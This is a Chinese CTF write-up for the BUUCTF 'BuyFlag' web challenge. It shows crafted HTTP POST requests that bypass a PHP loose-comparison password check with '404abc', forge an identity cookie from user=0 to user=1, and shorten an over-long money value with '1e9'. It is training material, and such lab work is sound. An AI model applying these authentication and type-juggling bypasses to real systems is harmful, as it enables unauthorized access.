BUUCTF在线评测-练习场-WebCTF习题[极客大挑战 2019]BuyFlag1-flag获取、解析

发布于:2025-06-28 ⋅ 阅读:(19) ⋅ 点赞:(0)

解题思路

题目提示买flag,打开靶场,发现一些没用的前端界面。尝试访问右上角和题目符合的payflag界面

Flag need your 100000000 money
If you want to buy the FLAG:
You must be a student from CUIT!!!
You must be answer the correct password!!!

Only Cuit's students can buy the FLAG

总结给出了以上提示,必须指定的金额、且必须正确密码并且是来自CUIT的学生。

提示可以明显知道,是要更改请求包,伪造身份了,但是还是有很多信息不知道。这里打开源码可以发现

<!--
	~~~post money and password~~~
if (isset($_POST['password'])) {
	$password = $_POST['password'];
	if (is_numeric($password)) {
		echo "password can't be number</br>";
	}elseif ($password == 404) {
		echo "Password Right!</br>";
	}
}
-->

提示是POST提交数据,然后password必须是数字,然后又要与404相等,很明显的弱比较,php在比较字符和数字的时候,会比较字符前面的数字,那么我们password=404abc即可,就既可以绕过数字检测,又可以与404弱比较相等。

直接抓包进行伪造尝试

POST /pay.php HTTP/1.1
Host: 5b8c9b81-bda5-47c5-80f3-e847fde56de0.node5.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1, i
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 32
Cookie: user=0
Content-Type: application/x-www-form-urlencoded

password=404abc&money=1000000000

这里需要注意,更改get请求为post,需要添加请求头,否则服务器无法理解post请求

Content-Type: application/x-www-form-urlencoded

发送伪造的请求包,仍然提示

Only Cuit's students can buy the FLAG</br>

还没有伪造身份,这里可以发现回应包包含以下请求头

Set-Cookie: user=0

该请求头会为我们自动设置cookie为user=0,我们知道0代表否定,可能就是这里否定了我们的身份,尝试更改为永真1伪造

POST /pay.php HTTP/1.1
Host: 5b8c9b81-bda5-47c5-80f3-e847fde56de0.node5.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1, i
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 32
Cookie: user=1
Content-Type: application/x-www-form-urlencoded

password=404abc&money=1000000000

回显

<p>
you are Cuiter</br>Password Right!</br>Nember lenth is too long</br>	
</p>

提示数字太长了,那应该是money数字太长,使用e计数法

POST /pay.php HTTP/1.1
Host: 5b8c9b81-bda5-47c5-80f3-e847fde56de0.node5.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1, i
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 32
Cookie: user=1
Content-Type: application/x-www-form-urlencoded

password=404abc&money=1e9

成功获取

 

总结

比较基础的一道伪造题。cookie那个地方比较坑吧,我还尝试了挺多伪造的,结果是把cookie改了就行...

网站公告

今日签到

点亮在社区的每一天
去签到

热门文章

最新发布